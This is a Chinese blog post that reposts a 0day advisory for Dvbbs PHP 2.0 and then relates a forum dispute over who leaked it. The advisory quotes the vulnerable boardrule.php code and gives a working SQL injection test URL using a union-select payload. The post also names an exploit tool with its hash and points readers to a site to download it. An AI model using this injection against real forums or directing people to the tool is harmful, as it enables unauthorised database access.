由Dvbbs PHP 0day引发的争论 
版权声明:原创作品,谢绝转载!否则将追究法律责任。 |
由Dvbbs PHP 0day引发的争论
昨天刚刚得到Dvbbs PHP 0day 的资料,看来还是晚了,今天无意间发现了有趣的事情,所以就给大家贴出来。呵呵
漏洞给大家播报下
================================================================ Dvbbs PHP 0day 影响版本:2.0 漏洞文件:/boardrule.php Author:sniperhg 小蟑螂 信息来源:零客网安 www.0kee.com --------------------分割JJ---------------------- 相关代码: function brule() { global $dv,$db,$boardid,$lang,$groupboardid; $groupboardid=$_GET['groupboardid']; if(!empty($_GET['groupboardid'])){ $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}"); } else{ $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}"); } 直接获得变量groupboardid,不为空就直接带入查询导致注入。 测试:http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version ()/*
利用工具 dvbbs_php2.0_fucker_.exe MD5 : 6b931f8e00e90cf4b1faa531a59d4b36 ========================================================================================= (应该是0DAY的发现者说的,还有可能是零客的老大 下称作者)题外话:这个0day作为内部信息我只在10号那天在群共享里发了。 之前sniperhg本打算在清明节时发出来,没想到今天下午无意中在鬼仔的blog里看到了这个。 http://www.huaidan.org/blog/article.asp?id=1767 文中除了把版权信息去掉了之外跟我在群里发的txt几乎一个字都不带差的。居然说是拣的。 东西发就发了,无所谓,也不是多好的东西。
但是就这件事,我非常不爽。 是谁泄露的,我早晚会查个水落石出。 论坛斑竹:
跟帖。。。
我X那个人。
鬼仔也不厚道~
鬼仔:
。。。。。。
不是我不厚道,我是没想那么多就发出来了。 不好意思。
作者: 说实话
一定得查查谁泄露的 和鬼仔没关系 感觉自己内部群里不应该出现会泄露信息的人 我一直很相信自己人的 现在也不例外 鬼仔:
关于把版权信息去掉的问题,是我确实不知道是你们这里的,我把你们版权信息加上了。
内部成员:
你还真会捡啊???/
鬼仔:
我已经道歉了,没必要这样了吧?
作者:
没意见 看看蟑螂有何意见和想法 游客:
不是内部泄露就是马化腾个J8@!
小蟑螂:
事都过去了。 但是我希望你能告诉是谁给你的。 OK的话就PM给我。不行就当我没说。 我不希望这个人是我群里的。 呵呵,如果能联想到一起,那么就更有趣了,最后总结一句话,什么事情就怕出内奸,
关于发布的ODAY工具,网上的大都不能用 大家可以到 http://www.520jsj.com上去下载,也可以到上面的官方去下载哦。
本文出自 “blacksnow's BLOG” 博客,谢绝转载! 本文出自 51CTO.COM技术博客 |
blacksnow
博客统计信息
热门文章
最新评论
友情链接